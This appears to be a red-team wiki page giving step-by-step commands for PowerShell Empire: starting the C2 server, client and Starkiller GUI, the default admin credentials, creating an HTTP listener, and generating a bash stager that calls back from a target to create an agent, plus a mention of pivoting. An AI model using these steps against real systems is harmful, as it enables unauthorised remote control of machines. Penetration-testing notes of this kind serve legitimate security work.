powershell empire

  • Start powershell empire server (usually done on a cloud instance for a red team)

    • sudo powershell-empire server

  • Start powershell empire client

    • powershell-empire client

    • to connect to a remote client add to the end:

    • HOSTNAME --username=USERNAME --password=PASSWORD.

  • starkiller can be used by running "starkiller" in the terminal

    • this will bring up a gui

    • the default credentials are empireadmin password123

  • Choose a listener

    • uselistener http

  • at a minimum we need to set host and port in the options (option names are case sensitive)

    • set host <local ip>

    • set port 8000

  • stagers are payloads, they are used to connect back to waiting listeners and create an agent when executed

    • usestager multi/bash

    • at a minimum set the listener name to the one created earlier

    • set Listener CLIHTTP

    • run 'execute' to execute the stager, this will give a script to execute on the target

  • run the stager code on the target, this should check the agent in with the empire server.

  • running 'agents' in the client will list every agent we can interact with

  • hop listeners can be used for pivoting with empire

Previousconnecting to windows environments with a user accountNextArmitage

Last updated